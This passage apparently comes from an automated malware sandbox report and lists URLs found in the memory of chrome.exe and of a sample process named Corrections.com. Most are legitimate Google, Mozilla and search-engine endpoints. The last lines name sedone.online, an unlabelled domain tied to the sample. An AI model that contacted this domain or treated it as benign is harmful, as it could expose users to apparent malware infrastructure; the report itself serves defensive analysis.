Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000000F.00000003.2121171342.0000413000EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000000F.00000003.2121360637.0000413000CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127554316.0000413000384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119669400.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127832603.0000413000CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127601269.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119776316.0000413000CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2121171342.0000413000EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100886504.0000741C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000000F.00000003.2097057250.000060DC002DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2097075437.000060DC002E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000000F.00000003.2119030653.0000413000B58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2145326471.0000413000B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chrome.exe, 0000000F.00000003.2100886504.0000741C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/C
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/J
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/M
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/T
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/W
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/X
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/a
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/e
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/h
Source: chrome.exe, 0000000F.00000003.2100886504.0000741C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hk
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/k
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/o
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/r
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/u
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/y
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100886504.0000741C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000000F.00000003.2100886504.0000741C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 0000000F.00000003.2100886504.0000741C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 0000000F.00000003.2154613889.0000413002D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 0000000F.00000003.2154613889.0000413002D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardA0
Source: chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 0000000F.00000003.2101180327.0000741C006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2154925803.000041300079C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 0000000F.00000003.2145075992.0000413000BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 0000000F.00000003.2120836848.0000413000724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 0000000F.00000003.2120836848.0000413000724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000000F.00000003.2120836848.0000413000724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000000F.00000003.2120836848.0000413000724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 0000000F.00000003.2120836848.0000413000724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004C3A000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online
Source: Corrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/
